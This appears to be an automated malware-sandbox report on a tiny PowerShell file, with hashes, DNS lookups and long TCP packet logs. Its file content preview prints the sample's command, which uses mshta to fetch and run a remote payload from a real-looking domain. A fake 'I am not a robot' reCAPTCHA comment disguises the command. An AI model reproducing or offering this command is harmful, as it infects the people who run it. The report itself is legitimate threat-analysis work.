                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                            Malicious:false
                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                            Static File Info

                                            General

                                            File type:Unicode text, UTF-8 text, with no line terminators
                                            Entropy (8bit):4.784398940592873
                                            TrID:
                                              File name:#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1
                                              File size:116 bytes
                                              MD5:ce91da6730103e8f7311290bc43c20ad
                                              SHA1:6e512fd63d482dc1e5fc02f91a45a56681a4f430
                                              SHA256:5c82bdcc335fd2663b57278bda53c2f7b1a3c561e47e77807f3dd937aaa8e577
                                              SHA512:4ee5e8662114dc4f96bbc144906f582c85cc4250435c907be4bcebd93cfb5e93f772161ecac15630726da483573485a21c9e1814cbb6e32c146fe331ba151654
                                              SSDEEP:3:rN6eom7MXAE6Luj7FS96Ct+RbqRF4I1yMQRWL7n:Z6eo+MXAEOu+6C0IMPy7n
                                              TLSH:8FB012D7D81C12017A93A3A3176C379E9B7F227825F46A33629F487840279F2D717525
                                              File Content Preview:mshta https://pawpaws.readit-carfanatics.com/madonna.mp4 # ... ''I am not a robot - reCAPTCHA Verification ID: 2165

                                              File Icon

                                              Icon Hash:3270d6baae77db44

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 24, 2024 15:30:59.244585037 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:30:59.244643927 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:30:59.244719028 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:30:59.256724119 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:30:59.256740093 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:00.477869034 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:00.477962971 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:00.552639008 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:00.552664042 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:00.552932024 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:00.552985907 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:00.554954052 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:00.599334955 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081480980 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081532001 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081562042 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081589937 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081624985 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081655025 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081693888 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.081739902 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.081758976 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.081808090 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.089890957 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.089952946 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.090066910 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.090110064 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.099493027 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.099550962 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.106956005 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.107032061 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.201993942 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.202152014 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.202276945 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.202323914 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.272874117 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.272945881 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.276772022 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.276829958 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.278354883 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.278398037 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.286448002 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.286511898 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.286879063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.286935091 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.294604063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.294662952 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.294687986 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.294728041 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.302881002 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.302937984 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.303050041 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.303092003 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.310739040 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.310935974 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.310949087 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.310993910 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.320396900 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.320445061 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.320533991 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.320574045 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.326773882 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.326817036 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.327337980 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.327377081 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.334902048 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.334969997 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.335151911 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.335196018 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.343400002 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.343456984 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.349517107 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.349570036 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.349579096 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.349621058 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.355972052 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.356024027 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.356570005 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.356616974 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.465229034 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.465274096 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.465286016 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.465325117 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.468322039 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.468374968 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.468693018 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.468734980 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.475054026 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.475116014 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.477752924 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.477801085 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.483645916 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.483696938 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.491069078 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.491122007 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.503173113 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.503232956 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.509572029 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.509651899 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.516130924 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.516321898 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.529064894 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.529165030 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.539375067 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.539453030 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.545104027 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.545178890 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.555775881 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.555830002 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.565411091 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.565464973 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.575534105 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.575587034 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.581437111 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.581485987 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.657102108 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.657159090 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.664700031 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.664752960 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.671025991 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.671087980 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.679296017 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.679347038 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.688191891 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.688242912 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.693607092 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.693660021 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.699824095 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.699877024 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.703298092 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.703351974 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.710434914 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.710489035 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.717370033 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.717427015 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.724436998 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.724489927 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.729052067 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.729103088 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.735059977 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.735109091 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.741677999 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.741739988 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.748681068 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.748737097 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.750823975 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.750874043 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.757405043 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.757456064 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.764285088 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.764333963 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.771188021 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.771262884 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.776099920 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.776156902 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.781599045 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.781652927 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.788634062 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.788680077 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.792722940 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.792779922 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.798959017 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.799010992 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.805622101 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.805669069 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.849169016 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.849220991 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.854618073 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.854675055 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.857217073 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.857270956 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.863507986 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.863605022 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.873800993 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.873842955 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.873874903 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.873887062 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.873898029 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.873922110 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.890249014 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.890265942 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.890348911 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.890358925 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.890402079 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.903907061 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.903923035 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.903976917 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.903983116 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.904023886 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.914505959 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.914525986 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.914566040 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.914572001 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.914597034 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.914614916 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.923495054 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.923507929 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.923567057 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.923572063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.923610926 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.931493998 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.931507111 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.931552887 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.931557894 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.931592941 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.940197945 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.940212965 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.940262079 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.940268993 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:01.940285921 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:01.940294981 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.040873051 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.040926933 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.048150063 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.048165083 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.048217058 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.048224926 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.048254013 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.048279047 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.054277897 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.054299116 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.054331064 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.054337025 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.054364920 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.054383039 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.060602903 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.060623884 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.060658932 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.060663939 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.060687065 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.060704947 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.065135956 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.065176964 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.065193892 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.065200090 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.065220118 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.065227985 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.067079067 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.067130089 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.072865009 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.072876930 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.072923899 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.072930098 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.072961092 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.072973013 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.074817896 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.074868917 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.080945969 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.080959082 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.081024885 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.081032038 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.081068993 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.081901073 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.081957102 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.088259935 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.088274956 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.088321924 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.088329077 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.088367939 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.089267015 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.089309931 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.235141993 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.235183954 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.235219955 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.235258102 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.235272884 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.235301971 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.241333008 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.241348982 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.241410017 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.241425991 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.241462946 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.243989944 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.244039059 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.244046926 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.244093895 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.251077890 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.251096010 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.251135111 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.251140118 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.251167059 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.251188040 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.256562948 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.256578922 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.256628036 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.256634951 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.256671906 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.261434078 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.261470079 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.261487961 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.261495113 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.261507988 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:02.261519909 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.261537075 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.261559963 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.261698008 CET49730443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:02.261713028 CET44349730172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:05.415133953 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:05.415179968 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:05.415263891 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:05.423818111 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:05.423840046 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:06.638498068 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:06.638587952 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:06.641098022 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:06.641108036 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:06.641318083 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:06.653100967 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:06.695337057 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:07.196409941 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:07.196468115 CET44349734172.67.201.143192.168.2.4
                                              Dec 24, 2024 15:31:07.196516991 CET49734443192.168.2.4172.67.201.143
                                              Dec 24, 2024 15:31:07.203849077 CET49734443192.168.2.4172.67.201.143

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 24, 2024 15:30:58.906485081 CET4970853192.168.2.41.1.1.1
                                              Dec 24, 2024 15:30:59.236728907 CET53497081.1.1.1192.168.2.4
                                              Dec 24, 2024 15:31:05.263504028 CET5321753192.168.2.41.1.1.1
                                              Dec 24, 2024 15:31:05.406656981 CET53532171.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 24, 2024 15:30:58.906485081 CET192.168.2.41.1.1.10x6772Standard query (0)pawpaws.readit-carfanatics.comA (IP address)IN (0x0001)false
                                              Dec 24, 2024 15:31:05.263504028 CET192.168.2.41.1.1.10x4d19Standard query (0)pawpaws1.readit-carfanatics.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 24, 2024 15:30:59.236728907 CET1.1.1.1192.168.2.40x6772No error (0)pawpaws.readit-carfanatics.com172.67.201.143A (IP address)IN (0x0001)false
                                              Dec 24, 2024 15:30:59.236728907 CET1.1.1.1192.168.2.40x6772No error (0)pawpaws.readit-carfanatics.com104.21.52.169A (IP address)IN (0x0001)false
                                              Dec 24, 2024 15:31:05.406656981 CET1.1.1.1192.168.2.40x4d19No error (0)pawpaws1.readit-carfanatics.com172.67.201.143A (IP address)IN (0x0001)false
